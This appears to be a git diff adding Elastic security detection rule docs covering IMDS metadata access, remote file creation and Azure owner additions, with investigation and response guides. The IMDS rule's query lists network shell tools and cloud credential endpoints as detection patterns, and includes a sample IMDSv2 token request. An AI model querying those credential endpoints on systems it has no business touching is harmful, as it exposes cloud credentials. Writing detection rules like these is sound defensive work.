+ + +*Response and remediation* + + +- Isolate the host by removing it from DNS rotation and restricting network access to management-only, then capture and quarantine any files dns.exe created or modified outside %SystemRoot%\System32\Dns or with executable extensions. +- Delete or quarantine suspicious artifacts written by dns.exe (e.g., .exe, .dll, .ps1, .js) in %SystemRoot%\System32, NETLOGON, or SYSVOL, record their hashes, and block them fleetwide via EDR or application control. +- Remove persistence by disabling and deleting any new or altered Windows services, scheduled tasks, or Run/Autorun registry entries that reference the dns.exe-written file path, and restore legitimate service ImagePath values. +- Recover by repairing system files with SFC/DISM, restoring affected directories from known-good backups, and restarting the DNS service, then validate zone integrity, AD replication, and client name resolution. +- Immediately escalate to incident response if dns.exe wrote an executable or script into NETLOGON or SYSVOL or if a service binary path was changed to point to a newly dropped file, indicating probable domain controller compromise and lateral movement. +- Harden by applying the latest Windows Server DNS patches, enforcing WDAC/AppLocker to block execution from SYSVOL/NETLOGON and restrict dns.exe writes to the DNS and log directories, and enable auditing on service creation and file writes in System32/NETLOGON/SYSVOL. + + +==== Rule query + + +[source, js] +---------------------------------- +event.category : "file" and host.os.type : "windows" and + event.type : ("creation" or "deletion" or "change") and process.name : "dns.exe" and + not file.extension : ("old" or "temp" or "bak" or "dns" or "arpa" or "log") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Exploitation of Remote Services +** ID: T1210 +** Reference URL: https://attack.mitre.org/techniques/T1210/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-unusual-instance-metadata-service-imds-api-request.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-unusual-instance-metadata-service-imds-api-request.asciidoc new file mode 100644 index 0000000000..3a2dfa71d2 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-unusual-instance-metadata-service-imds-api-request.asciidoc @@ -0,0 +1,231 @@ +[[prebuilt-rule-8-19-8-unusual-instance-metadata-service-imds-api-request]] +=== Unusual Instance Metadata Service (IMDS) API Request + +This rule identifies potentially malicious processes attempting to access the cloud service provider's instance metadata service (IMDS) API endpoint, which can be used to retrieve sensitive instance-specific information such as instance ID, public IP address, and even temporary security credentials if roles are assumed by that instance. The rule monitors for various tools and scripts like curl, wget, python, and perl that might be used to interact with the metadata API.
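+
+For context, the legitimate IMDSv2 pattern that the rule's curl carve-outs are built around is a PUT request for a session token (sent with the `X-aws-ec2-metadata-token-ttl-seconds` header) followed by metadata requests that present that token. The following Python sketch illustrates this flow with the standard library only; it assumes it runs on an AWS EC2 instance and is not part of the rule logic:
+
+[source, python]
+----------------------------------
+import urllib.request
+
+IMDS = "http://169.254.169.254"
+
+# Step 1: request a short-lived IMDSv2 session token.
+token_request = urllib.request.Request(
+    IMDS + "/latest/api/token",
+    method="PUT",
+    headers={"X-aws-ec2-metadata-token-ttl-seconds": "21600"},
+)
+with urllib.request.urlopen(token_request, timeout=2) as response:
+    token = response.read().decode()
+
+# Step 2: present the token on subsequent metadata requests.
+metadata_request = urllib.request.Request(
+    IMDS + "/latest/meta-data/instance-id",
+    headers={"X-aws-ec2-metadata-token": token},
+)
+with urllib.request.urlopen(metadata_request, timeout=2) as response:
+    print(response.read().decode())
+----------------------------------
+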
+ +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.network* +* logs-endpoint.events.process* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://hackingthe.cloud/aws/general-knowledge/intro_metadata_service/ +* https://www.wiz.io/blog/imds-anomaly-hunting-zero-day + +*Tags*: + +* Domain: Endpoint +* Domain: Cloud +* OS: Linux +* Use Case: Threat Detection +* Tactic: Credential Access +* Tactic: Discovery +* Data Source: Elastic Defend +* Resources: Investigation Guide + +*Version*: 7 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Unusual Instance Metadata Service (IMDS) API Request* + + +The Instance Metadata Service (IMDS) API provides essential instance-specific data, including configuration details and temporary credentials, to applications running on cloud instances. Adversaries exploit this by using scripts or tools to access sensitive data, potentially leading to unauthorized access. The detection rule identifies suspicious access attempts by monitoring specific processes and network activities, excluding known legitimate paths, to flag potential misuse. + + +*Possible investigation steps* + + +- Review the process details such as process.name and process.command_line to identify the tool or script used to access the IMDS API and determine if it aligns with known malicious behavior. +- Examine the process.executable and process.working_directory fields to verify if the execution path is unusual or suspicious, especially if it originates from directories like /tmp/* or /var/tmp/*. +- Check the process.parent.entity_id and process.parent.executable to understand the parent process and its legitimacy, which might provide context on how the suspicious process was initiated. +- Investigate the network event details, particularly the destination.ip field, to confirm if there was an attempted connection to the IMDS API endpoint at 169.254.169.254. +- Correlate the host.id with other security events or logs to identify any additional suspicious activities or patterns on the same host that might indicate a broader compromise. +- Assess the risk score and severity to prioritize the investigation and determine if immediate action is required to mitigate potential threats. + + +*False positive analysis* + + +- Security and monitoring tools like Rapid7, Nessus, and Amazon SSM Agent may trigger false positives due to their legitimate access to the IMDS API. Users can exclude these by adding their working directories to the exception list. +- Automated scripts or processes running from known directories such as /opt/rumble/bin or /usr/share/ec2-instance-connect may also cause false positives. Exclude these directories or specific executables from the rule to prevent unnecessary alerts. +- System maintenance or configuration scripts that access the IMDS API for legitimate purposes might be flagged. 
Identify these scripts and add their paths or parent executables to the exclusion list to reduce noise. +- Regular network monitoring tools that attempt connections to the IMDS IP address for health checks or status updates can be excluded by specifying their process names or executable paths in the exception criteria. + + +*Response and remediation* + + +- Immediately isolate the affected instance from the network to prevent further unauthorized access or data exfiltration. +- Terminate any suspicious processes identified in the alert that are attempting to access the IMDS API, especially those using tools like curl, wget, or python. +- Revoke any temporary credentials that may have been exposed or accessed through the IMDS API to prevent unauthorized use. +- Conduct a thorough review of the instance's security groups and IAM roles to ensure that only necessary permissions are granted and that there are no overly permissive policies. +- Escalate the incident to the security operations team for further investigation and to determine if additional instances or resources are affected. +- Implement network monitoring to detect and alert on any future attempts to access the IMDS API from unauthorized processes or locations. +- Review and update the instance's security configurations and apply any necessary patches or updates to mitigate vulnerabilities that could be exploited in similar attacks. + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id, process.parent.entity_id with maxspan=3s +[ + process + where host.os.type == "linux" + and event.type == "start" + and event.action == "exec" + and process.parent.executable != null + + // common tooling / suspicious names (keep broad) + and ( + process.name : ( + "curl", "wget", "python*", "perl*", "php*", "ruby*", "lua*", "telnet", "pwsh", + "openssl", "nc", "ncat", "netcat", "awk", "gawk", "mawk", "nawk", "socat", "node", + "bash", "sh" + ) + or + // suspicious execution locations (dropped binaries / temp execution) + process.executable : ( + "./*", "/tmp/*", "/var/tmp/*", "/var/www/*", "/dev/shm/*", "/etc/init.d/*", "/etc/rc*.d/*", + "/etc/cron*", "/etc/update-motd.d/*", "/boot/*", "/srv/*", "/run/*", "/etc/rc.local" + ) + or + // threat-relevant IMDS / metadata endpoints (inclusion list) + process.command_line : ( + "*169.254.169.254/latest/api/token*", + "*169.254.169.254/latest/meta-data/iam/security-credentials*", + "*169.254.169.254/latest/meta-data/local-ipv4*", + "*169.254.169.254/latest/meta-data/local-hostname*", + "*169.254.169.254/latest/meta-data/public-ipv4*", + "*169.254.169.254/latest/user-data*", + "*169.254.169.254/latest/dynamic/instance-identity/document*", + "*169.254.169.254/latest/meta-data/instance-id*", + "*169.254.169.254/latest/meta-data/public-keys*", + "*computeMetadata/v1/instance/service-accounts/*/token*", + "*/metadata/identity/oauth2/token*", + "*169.254.169.254/opc/v*/instance*", + "*169.254.169.254/opc/v*/vnics*" + ) + ) + + // global working-dir / executable / parent exclusions for known benign agents + and not process.working_directory : ( + "/opt/rapid7*", + "/opt/nessus*", + "/snap/amazon-ssm-agent*", + "/var/snap/amazon-ssm-agent/*", + "/var/log/amazon/ssm/*", + "/srv/snp/docker/overlay2*", + "/opt/nessus_agent/var/nessus/*" + ) + + and not process.executable : ( + "/opt/rumble/bin/rumble-agent*", + "/opt/aws/inspector/bin/inspectorssmplugin", + "/snap/oracle-cloud-agent/*", + "/lusr/libexec/oracle-cloud-agent/*" + ) + + and not process.parent.executable : ( + 
"/usr/bin/setup-policy-routes", + "/usr/share/ec2-instance-connect/*", + "/var/lib/amazon/ssm/*", + "/etc/update-motd.d/30-banner", + "/usr/sbin/dhclient-script", + "/usr/local/bin/uwsgi", + "/usr/lib/skylight/al-extras", + "/usr/bin/cloud-init", + "/usr/sbin/waagent", + "/usr/bin/google_osconfig_agent", + "/usr/bin/docker", + "/usr/bin/containerd-shim", + "/usr/bin/runc" + ) + + and not process.entry_leader.executable : ( + "/usr/local/qualys/cloud-agent/bin/qualys-cloud-agent", + "/opt/Elastic/Agent/data/elastic-agent-*/elastic-agent", + "/opt/nessus_agent/sbin/nessus-service" + ) + + // carve-out: safe /usr/bin/curl usage (suppress noisy, legitimate agent patterns) + and not ( + process.executable == "/usr/bin/curl" + and ( + // AWS IMDSv2 token PUT that includes ttl header + (process.command_line : "*-X PUT*169.254.169.254/latest/api/token*" and process.command_line : "*X-aws-ec2-metadata-token-ttl-seconds*") + or + // Any IMDSv2 GET that includes token header for any /latest/* path + process.command_line : "*-H X-aws-ec2-metadata-token:*169.254.169.254/latest/*" + or + // Common amazon tooling UA + process.command_line : "*-A amazon-ec2-net-utils/*" + or + // Azure metadata legitimate header + process.command_line : "*-H Metadata:true*169.254.169.254/metadata/*" + or + // Oracle IMDS legitimate header + process.command_line : "*-H Authorization:*Oracle*169.254.169.254/opc/*" + ) + ) +] +[ + network where host.os.type == "linux" + and event.action == "connection_attempted" + and destination.ip == "169.254.169.254" +] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Unsecured Credentials +** ID: T1552 +** Reference URL: https://attack.mitre.org/techniques/T1552/ +* Sub-technique: +** Name: Cloud Instance Metadata API +** ID: T1552.005 +** Reference URL: https://attack.mitre.org/techniques/T1552/005/ +* Tactic: +** Name: Discovery +** ID: TA0007 +** Reference URL: https://attack.mitre.org/tactics/TA0007/ +* Technique: +** Name: Cloud Infrastructure Discovery +** ID: T1580 +** Reference URL: https://attack.mitre.org/techniques/T1580/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-unusual-remote-file-creation.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-unusual-remote-file-creation.asciidoc new file mode 100644 index 0000000000..2e27180b07 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-unusual-remote-file-creation.asciidoc @@ -0,0 +1,180 @@ +[[prebuilt-rule-8-19-8-unusual-remote-file-creation]] +=== Unusual Remote File Creation + +This rule leverages the new_terms rule type to detect file creation via a commonly used file transfer service while excluding typical remote file creation activity. This behavior is often linked to lateral movement, potentially indicating an attacker attempting to move within a network. 
+ +*Rule type*: new_terms + +*Rule indices*: + +* logs-endpoint.events.file* +* auditbeat-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Lateral Movement +* Data Source: Elastic Defend +* Resources: Investigation Guide + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Unusual Remote File Creation* + + +Remote file creation tools like SCP, FTP, and SFTP are essential for transferring files across networks, often used in legitimate administrative tasks. However, adversaries can exploit these services to move laterally within a network, creating files in unauthorized locations. The detection rule identifies suspicious file creation activities by monitoring specific processes and excluding typical paths, thus highlighting potential lateral movement attempts by attackers. + + +*Possible investigation steps* + + +- Review the alert details to identify the specific process name (e.g., scp, ftp, sftp) involved in the file creation event. +- Examine the file path where the file was created to determine if it is an unusual or unauthorized location, considering the exclusion of typical paths like /dev/ptmx, /run/*, or /var/run/*. +- Check the user account associated with the process to verify if it is a legitimate user or if there are signs of compromised credentials. +- Investigate the source and destination IP addresses involved in the file transfer to identify any suspicious or unexpected network connections. +- Analyze recent activity on the host to identify any other unusual or unauthorized actions that may indicate lateral movement or further compromise. +- Correlate this event with other alerts or logs to determine if it is part of a broader attack pattern or campaign within the network. + + +*False positive analysis* + + +- Administrative file transfers: Legitimate administrative tasks often involve transferring files using SCP, FTP, or SFTP. To manage this, create exceptions for known administrative accounts or specific IP addresses that regularly perform these tasks. +- Automated backup processes: Scheduled backups may use tools like rsync or sftp-server to create files remotely. Identify and exclude these processes by specifying the paths or scripts involved in the backup operations. +- System updates and patches: Some system updates might involve remote file creation in non-standard directories. Monitor update schedules and exclude these activities by correlating them with known update events. +- Development and testing environments: Developers may use remote file transfer services to deploy or test applications. Establish a baseline of typical development activities and exclude these from alerts by defining specific user accounts or project directories. +- Third-party integrations: Some third-party applications might require remote file creation as part of their functionality.
Document these integrations and exclude their associated processes or file paths from triggering alerts. + + +*Response and remediation* + + +- Isolate the affected host immediately to prevent further lateral movement within the network. This can be done by removing the host from the network or applying network segmentation controls. +- Terminate any suspicious processes identified in the alert, such as scp, ftp, sftp, vsftpd, sftp-server, or sync, to stop unauthorized file transfers. +- Conduct a thorough review of the file paths and files created to determine if any sensitive data has been compromised or if any malicious files have been introduced. +- Restore any unauthorized or malicious file changes from known good backups to ensure system integrity. +- Update and patch the affected systems to close any vulnerabilities that may have been exploited by the attacker. +- Implement stricter access controls and authentication mechanisms for remote file transfer services to prevent unauthorized use. +- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems have been compromised. + + +==== Setup + + + +*Setup* + + +This rule requires data coming in from one of the following integrations: +- Elastic Defend +- Auditbeat + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. + + +*Auditbeat Setup* + +Auditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. 
For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations. + + +*The following steps should be executed in order to add the Auditbeat on a Linux System:* + +- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages. +- To install the APT and YUM repositories follow the setup instructions in this https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html[helper guide]. +- To run Auditbeat on Docker follow the setup instructions in the https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html[helper guide]. +- To run Auditbeat on Kubernetes follow the setup instructions in the https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html[helper guide]. +- For complete “Setup and Run Auditbeat” information refer to the https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html[helper guide]. + + +==== Rule query + + +[source, js] +---------------------------------- +event.category:file and host.os.type:linux and event.action:creation and +process.name:(scp or ftp or sftp or vsftpd or sftp-server or sync) and +not ( + file.path:( + /dev/ptmx or /run/* or /var/run/* or /home/*/.ansible/*AnsiballZ_*.py or /home/*/.ansible/tmp/ansible-tmp* or + /root/.ansible/*AnsiballZ_*.py or /tmp/ansible-chief/ansible-tmp*AnsiballZ_*.py or + /tmp/newroot/home/*/.ansible/tmp/ansible-tmp*AnsiballZ_*.py or /tmp/.ansible/tmp/ansible-tmp*AnsiballZ_*.py or + /tmp/ansible-tmp-*/AnsiballZ_*.py or /tmp/.ansible/ansible-tmp-*AnsiballZ_*.py + ) or + file.extension:(filepart or yaml or new or rpm or deb) +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Remote Services +** ID: T1021 +** Reference URL: https://attack.mitre.org/techniques/T1021/ +* Sub-technique: +** Name: SSH +** ID: T1021.004 +** Reference URL: https://attack.mitre.org/techniques/T1021/004/ +* Technique: +** Name: Lateral Tool Transfer +** ID: T1570 +** Reference URL: https://attack.mitre.org/techniques/T1570/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-user-added-as-owner-for-azure-application.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-user-added-as-owner-for-azure-application.asciidoc new file mode 100644 index 0000000000..6d246388a5 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-user-added-as-owner-for-azure-application.asciidoc @@ -0,0 +1,121 @@ +[[prebuilt-rule-8-19-8-user-added-as-owner-for-azure-application]] +=== User Added as Owner for Azure Application + +Identifies when a user is added as an owner for an Azure application. An adversary may add a user account as an owner for an Azure application in order to grant additional permissions and modify the application's configuration using another account. 
+ +*Rule type*: query + +*Rule indices*: + +* logs-azure.auditlogs-* +* filebeat-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Use Case: Configuration Audit +* Tactic: Persistence +* Resources: Investigation Guide + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating User Added as Owner for Azure Application* + + +Azure applications often require specific permissions for functionality, managed by assigning user roles. An adversary might exploit this by adding themselves or a compromised account as an owner, gaining elevated privileges to alter configurations or access sensitive data. The detection rule monitors audit logs for successful operations where a user is added as an application owner, flagging potential unauthorized privilege escalations. + + +*Possible investigation steps* + + +- Review the Azure audit logs to confirm the operation by filtering for event.dataset:azure.auditlogs and azure.auditlogs.operation_name:"Add owner to application" with a successful outcome. +- Identify the user account that was added as an owner and the account that performed the operation to determine if they are legitimate or potentially compromised. +- Check the history of activities associated with both the added owner and the account that performed the operation to identify any suspicious behavior or patterns. +- Verify the application's current configuration and permissions to assess any changes made after the new owner was added. +- Contact the legitimate owner or administrator of the Azure application to confirm whether the addition of the new owner was authorized. +- Investigate any recent changes in the organization's user access policies or roles that might explain the addition of a new owner. + + +*False positive analysis* + + +- Routine administrative actions: Regular maintenance or updates by IT staff may involve adding users as application owners. To manage this, create a list of authorized personnel and exclude their actions from triggering alerts. +- Automated processes: Some applications may have automated scripts or services that add users as owners for operational purposes. Identify these processes and configure exceptions for their activities. +- Organizational changes: During mergers or restructuring, there may be legitimate reasons for adding multiple users as application owners. Temporarily adjust the rule to accommodate these changes and review the audit logs manually. +- Testing and development: In development environments, users may be added as owners for testing purposes. Exclude these environments from the rule or set up a separate monitoring policy with adjusted thresholds. + + +*Response and remediation* + + +- Immediately revoke the added user's owner permissions from the Azure application to prevent further unauthorized access or configuration changes. 
+- Conduct a thorough review of recent activity logs for the affected application to identify any unauthorized changes or data access that may have occurred since the user was added as an owner. +- Reset credentials and enforce multi-factor authentication for the compromised or suspicious account to prevent further misuse. +- Notify the security team and relevant stakeholders about the incident for awareness and potential escalation if further investigation reveals broader compromise. +- Implement additional monitoring on the affected application and related accounts to detect any further unauthorized access attempts or privilege escalations. +- Review and update access control policies to ensure that only authorized personnel can modify application ownership, and consider implementing stricter approval processes for such changes. +- Document the incident, including actions taken and lessons learned, to improve response strategies and prevent recurrence. + +==== Setup + + +The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:azure.auditlogs and azure.auditlogs.operation_name:"Add owner to application" and event.outcome:(Success or success) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Steal Application Access Token +** ID: T1528 +** Reference URL: https://attack.mitre.org/techniques/T1528/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-user-added-as-owner-for-azure-service-principal.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-user-added-as-owner-for-azure-service-principal.asciidoc new file mode 100644 index 0000000000..f6ec1e0a1e --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-user-added-as-owner-for-azure-service-principal.asciidoc @@ -0,0 +1,123 @@ +[[prebuilt-rule-8-19-8-user-added-as-owner-for-azure-service-principal]] +=== User Added as Owner for Azure Service Principal + +Identifies when a user is added as an owner for an Azure service principal. The service principal object defines what the application can do in the specific tenant, who can access the application, and what resources the app can access. A service principal object is created when an application is given permission to access resources in a tenant. An adversary may add a user account as an owner for a service principal and use that account in order to define what an application can do in the Azure AD tenant. 
+ +*Rule type*: query + +*Rule indices*: + +* logs-azure.auditlogs-* +* filebeat-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/azure/active-directory/develop/app-objects-and-service-principals + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Use Case: Configuration Audit +* Tactic: Persistence +* Resources: Investigation Guide + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating User Added as Owner for Azure Service Principal* + + +Azure service principals are crucial for managing application permissions within a tenant, defining access and capabilities. Adversaries may exploit this by adding themselves as owners, gaining control over application permissions and access. The detection rule monitors audit logs for successful owner additions, flagging potential unauthorized changes to maintain security integrity. + + +*Possible investigation steps* + + +- Review the audit log entry to confirm the event dataset is 'azure.auditlogs' and the operation name is "Add owner to service principal" with a successful outcome. +- Identify the user account that was added as an owner and gather information about this account, including recent activity and any associated alerts. +- Determine the service principal involved by reviewing its details, such as the application it is associated with and the permissions it holds. +- Check the history of changes to the service principal to identify any other recent modifications or suspicious activities. +- Investigate the context and necessity of the ownership change by contacting the user or team responsible for the service principal to verify if the change was authorized. +- Assess the potential impact of the ownership change on the tenant's security posture, considering the permissions and access granted to the service principal. + + +*False positive analysis* + + +- Routine administrative changes may trigger alerts when legitimate IT staff add themselves or others as owners for maintenance purposes. To manage this, create exceptions for known administrative accounts that frequently perform these actions. +- Automated processes or scripts that manage service principal ownership as part of regular operations can cause false positives. Identify and document these processes, then exclude them from triggering alerts by using specific identifiers or tags. +- Organizational changes, such as team restructuring, might lead to multiple legitimate ownership changes. During these periods, temporarily adjust the rule sensitivity or create temporary exceptions for specific user groups involved in the transition. +- Third-party applications that require ownership changes for integration purposes can also trigger alerts. Verify these applications and whitelist their associated service principal changes to prevent unnecessary alerts. 
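+
+As a rough illustration of the exception guidance above, the rule's base query can be narrowed so that ownership changes performed by known, approved administrative or automation identities do not generate alerts. This is a minimal sketch only: the `azure.auditlogs.properties.initiated_by.user.userPrincipalName` field and the example account names are assumptions that should be validated against the fields and identities present in your own environment before use.
+
+[source, js]
+----------------------------------
+event.dataset:azure.auditlogs and azure.auditlogs.operation_name:"Add owner to service principal" and
+event.outcome:(Success or success) and
+not azure.auditlogs.properties.initiated_by.user.userPrincipalName:(
+  "svc-automation@example.com" or "iam-admin@example.com"
+)
+----------------------------------
+
+Alternatively, a similar effect can be achieved without editing the prebuilt query by attaching a rule exception in Kibana that matches the approved user principal names, which keeps the query intact across rule package upgrades.
+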
+ + +*Response and remediation* + + +- Immediately revoke the added user's ownership from the Azure service principal to prevent unauthorized access and control. +- Conduct a thorough review of the affected service principal's permissions and access logs to identify any unauthorized changes or access attempts. +- Reset credentials and update any secrets or keys associated with the compromised service principal to mitigate potential misuse. +- Notify the security team and relevant stakeholders about the incident for awareness and further investigation. +- Implement conditional access policies to restrict who can add owners to service principals, ensuring only authorized personnel have this capability. +- Enhance monitoring and alerting for similar activities by increasing the sensitivity of alerts related to changes in service principal ownership. +- Document the incident and response actions taken to improve future incident response and refine security policies. + +==== Setup + + +The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:azure.auditlogs and azure.auditlogs.operation_name:"Add owner to service principal" and event.outcome:(Success or success) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rules-8-19-8-appendix.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rules-8-19-8-appendix.asciidoc new file mode 100644 index 0000000000..15e9a10f85 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rules-8-19-8-appendix.asciidoc @@ -0,0 +1,125 @@ +["appendix",role="exclude",id="prebuilt-rule-8-19-8-prebuilt-rules-8-19-8-appendix"] += Downloadable rule update v8.19.8 + +This section lists all updates associated with version 8.19.8 of the Fleet integration *Prebuilt Security Detection Rules*. 
+ + +include::prebuilt-rule-8-19-8-credential-access-via-trufflehog-execution.asciidoc[] +include::prebuilt-rule-8-19-8-azure-storage-account-blob-public-access-enabled.asciidoc[] +include::prebuilt-rule-8-19-8-azure-storage-account-keys-accessed-by-privileged-user.asciidoc[] +include::prebuilt-rule-8-19-8-entra-id-actor-token-user-impersonation-abuse.asciidoc[] +include::prebuilt-rule-8-19-8-microsoft-entra-id-protection-alert-and-device-registration.asciidoc[] +include::prebuilt-rule-8-19-8-azure-rbac-built-in-administrator-roles-assigned.asciidoc[] +include::prebuilt-rule-8-19-8-curl-or-wget-spawned-via-node-js.asciidoc[] +include::prebuilt-rule-8-19-8-github-authentication-token-access-via-node-js.asciidoc[] +include::prebuilt-rule-8-19-8-attempt-to-clear-logs-via-journalctl.asciidoc[] +include::prebuilt-rule-8-19-8-node-js-pre-or-post-install-script-execution.asciidoc[] +include::prebuilt-rule-8-19-8-potential-cve-2025-32463-nsswitch-file-creation.asciidoc[] +include::prebuilt-rule-8-19-8-potential-cve-2025-32463-sudo-chroot-execution-attempt.asciidoc[] +include::prebuilt-rule-8-19-8-potential-cve-2025-41244-vmtoolsd-lpe-exploitation-attempt.asciidoc[] +include::prebuilt-rule-8-19-8-suspicious-seincreasebasepriorityprivilege-use.asciidoc[] +include::prebuilt-rule-8-19-8-aws-s3-bucket-enumeration-or-brute-force.asciidoc[] +include::prebuilt-rule-8-19-8-potential-aws-s3-bucket-ransomware-note-uploaded.asciidoc[] +include::prebuilt-rule-8-19-8-aws-s3-static-site-javascript-file-uploaded.asciidoc[] 